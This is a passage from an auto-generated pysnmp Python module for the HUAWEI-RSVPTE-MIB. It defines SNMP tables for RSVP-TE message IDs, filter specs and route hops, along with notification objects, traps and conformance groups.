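# (ifIndex, hwRsvpTeNbrAddress, hwRsvpTeMessageIdEpoch,
# hwRsvpTeMessageIdNumber).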
hwRsvpTeMessageIdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7), )
if mibBuilder.loadTexts: hwRsvpTeMessageIdTable.setStatus('current')
hwRsvpTeMessageIdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdEpoch"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdNumber"))
if mibBuilder.loadTexts: hwRsvpTeMessageIdEntry.setStatus('current')
hwRsvpTeMessageIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdEpoch.setStatus('current')
hwRsvpTeMessageIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 2), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdNumber.setStatus('current')
hwRsvpTeMessageIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("senderIncoming", 1), ("senderOutgoing", 2), ("resv", 3), ("resvFwd", 4), ("rtBuff", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeMessageIdFlag.setStatus('current')
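# hwRsvpTeFilterSpecTable: FILTER_SPEC objects (LSP id, ingress LSR id, label)
# per reservation, indexed by (hwRsvpTeSessionNumber, hwRsvpTeResvNumber,
# hwRsvpTeFilterSpecNumber).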
hwRsvpTeFilterSpecTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8), )
if mibBuilder.loadTexts: hwRsvpTeFilterSpecTable.setStatus('current')
hwRsvpTeFilterSpecEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecNumber"))
if mibBuilder.loadTexts: hwRsvpTeFilterSpecEntry.setStatus('current')
hwRsvpTeFilterSpecNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeFilterSpecNumber.setStatus('current')
hwRsvpTeFilterSpecLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLspId.setStatus('current')
hwRsvpTeFilterSpecIngressLsrId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecIngressLsrId.setStatus('current')
hwRsvpTeFilterSpecLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLabel.setStatus('current')
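# hwRsvpTeRroTable: recorded-route (RRO) hops per sender, indexed by
# (hwRsvpTeSessionNumber, hwRsvpTeSenderNumber, hwRsvpTeRroNumber).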
hwRsvpTeRroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9), )
if mibBuilder.loadTexts: hwRsvpTeRroTable.setStatus('current')
hwRsvpTeRroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeRroNumber"))
if mibBuilder.loadTexts: hwRsvpTeRroEntry.setStatus('current')
hwRsvpTeRroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeRroNumber.setStatus('current')
hwRsvpTeRroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2), ("label", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroType.setStatus('current')
hwRsvpTeRroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpAddr.setStatus('current')
hwRsvpTeRroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpPrefixLen.setStatus('current')
hwRsvpTeRroLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroLabel.setStatus('current')
hwRsvpTeRroFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroFlag.setStatus('current')
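# hwRsvpTeEroTable: explicit-route (ERO) hops per sender, indexed by
# (hwRsvpTeSessionNumber, hwRsvpTeSenderNumber, hwRsvpTeEroNumber).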
hwRsvpTeEroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10), )
if mibBuilder.loadTexts: hwRsvpTeEroTable.setStatus('current')
hwRsvpTeEroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeEroNumber"))
if mibBuilder.loadTexts: hwRsvpTeEroEntry.setStatus('current')
hwRsvpTeEroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeEroNumber.setStatus('current')
hwRsvpTeEroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroType.setStatus('current')
hwRsvpTeEroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpAddr.setStatus('current')
hwRsvpTeEroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpPrefixLen.setStatus('current')
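# Extension subtrees; hwRsvpTeTrapObjects holds the accessible-for-notify
# scalars that are bound into the notifications below.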
hwRsvpTeExtendObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 11))
hwRsvpTeExtendTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12))
hwRsvpTeTrapObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1))
hwRsvpTeNbr = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 1), IpAddress()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeNbr.setStatus('current')
hwRsvpTeIfNbrCurrentCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 2), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrCurrentCount.setStatus('current')
hwRsvpTeIfNbrThreshold = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 3), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrThreshold.setStatus('current')
hwRsvpTeIfNbrTotalCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 4), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCount.setStatus('current')
hwRsvpTeIfName = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 5), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfName.setStatus('current')
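# hwRsvpTeTrap subtree: notifications for hello loss/recovery, authentication
# failure/success and per-interface neighbor threshold/total-count alarms.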
hwRsvpTeTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2))
hwRsvpTeHelloLost = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLost.setStatus('current')
hwRsvpTeHelloLostRecovery = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLostRecovery.setStatus('current')
hwRsvpTeAuthFail = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthFail.setStatus('current')
hwRsvpTeAuthSuccess = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthSuccess.setStatus('current')
hwRsvpTeIfNbrThresholdExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceed.setStatus('current')
hwRsvpTeIfNbrThresholdExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceedClear.setStatus('current')
hwRsvpTeIfNbrTotalCountExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceed.setStatus('current')
hwRsvpTeIfNbrTotalCountExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceedClear.setStatus('current')
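# Conformance section: object groups enumerating the objects defined above.
# The getattr version guards appear to be the pysmi template's compatibility
# shim, calling setStatus on groups only under pysnmp releases newer than
# 4.4.0.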
hwRsvpTeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2))
hwRsvpTeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1))
hwRsvpTeSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionSenders"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionReceivers"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionRequests"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelExtId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionLspsNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionStyle"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeSessionGroup = hwRsvpTeSessionGroup.setStatus('current')
hwRsvpTeSenderGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderClassType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestCtype"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestL3pid"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMinDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMaxDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrIncludeAny"), ("HUAWEI-RSVPTE-MIB", 
"hwRsvpTeSenderSessionAttrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHopLimit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrBandwidth"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrInuseFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDiffServPsc"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeSenderGroup = hwRsvpTeSenderGroup.setStatus('current')
hwRsvpTeResvGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvConfirm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeResvGroup = hwRsvpTeResvGroup.setStatus('current')
hwRsvpTeResvFwdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRsvpHop"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeResvFwdGroup = hwRsvpTeResvFwdGroup.setStatus('current')
hwRsvpTeIfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfIpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshBlockadeMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRouteDelay"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpRequired"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranIncDelta"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEncrypted"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthHandshake"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthKey"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfWindowSize"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthLifeTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeIfGroup = hwRsvpTeIfGroup.setStatus('current')
hwRsvpTeNbrGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloSrcInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloDstInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloLostCounter"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrSendersNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReceiversNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrCapability"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRestartTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRecoveryTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAuthKeyId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReductionEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReliabilityEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrProtocol"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeNbrGroup = hwRsvpTeNbrGroup.setStatus('current')
hwRsvpTeMessageIdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeMessageIdGroup = hwRsvpTeMessageIdGroup.setStatus('current')
hwRsvpTeFilterSpecGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecIngressLsrId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLabel"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeFilterSpecGroup = hwRsvpTeFilterSpecGroup.setStatus('current')
